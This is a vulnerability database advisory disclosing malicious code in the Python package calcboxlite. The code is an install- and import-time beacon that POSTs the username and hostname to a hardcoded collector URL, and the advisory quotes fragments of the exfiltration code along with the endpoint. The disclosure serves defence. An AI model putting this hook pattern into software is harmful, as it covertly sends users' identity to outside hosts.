VDB
GCVE-110-OSM-2026-11369
GCVE-110-OSM-2026-11369
Advisory PublishedCVSS 8.8/10
setup.py and calcboxlite/__init__.py both invoke a top-level `_report()` function that reads `getpass.getuser()` and `socket.gethostname()` and POSTs them as JSON to a hardcoded remote collector at https://k4m2qhx7ptv9nzcr3bwe8syd6ljfa0gu1.oast.invalid/collect. The beacon fires automatically on `pip install` and again on every `import calcboxlite`, so consumers in sandboxed builds, CI runners, REPLs, or downstream libraries all transmit installer identity to the endpoint. The destination host is unrelated to any advertised calculator functionality and is characteristic of an out-of-band interaction collector used for identifying vulnerable installers.
ENTRY
calcboxlite/__init__.py (module-import: 23)
DESTINATION
- 1 exfil (custom-c2)
(values recorded in verified_iocs)
EXFIL
- Python File Upload to Remote in calcboxlite/__init__.py: "urllib.request.Request( _ENDPOINT, data="
- System Information Exfiltration in calcboxlite/__init__.py: "socket.gethostname()} ).encode() req = urllib.request.Request( _ENDPOINT, data=p..."
- HTTP Data Exfiltration in calcboxlite/__init__.py: "getpass.getuser(), "host": socket.gethostname()} ).encode() req = urllib"
- Python File Upload to Remote in setup.py: "urllib.request.Request( _ENDPOINT, data="
- System Information Exfiltration in setup.py: "socket.gethostname()} ).encode() req = urllib.request.Request( _ENDPOINT, data=p..."
- HTTP Data Exfiltration in setup.py: "getpass.getuser(), "host": socket.gethostname()} ).encode() req = urllib"
- Network Request in calcboxlite/__init__.py: "urllib.request.Request("
- System Information Collection in calcboxlite/__init__.py: "socket.gethostname()"
(+4 more)
PAYLOAD FILES
calcboxlite/__init__.py (+ setup.py)
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | calcboxlite | all (affected) | — |
Aliases
Browse GCVE Records
805 records in the GCVE database · Updated September 2, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.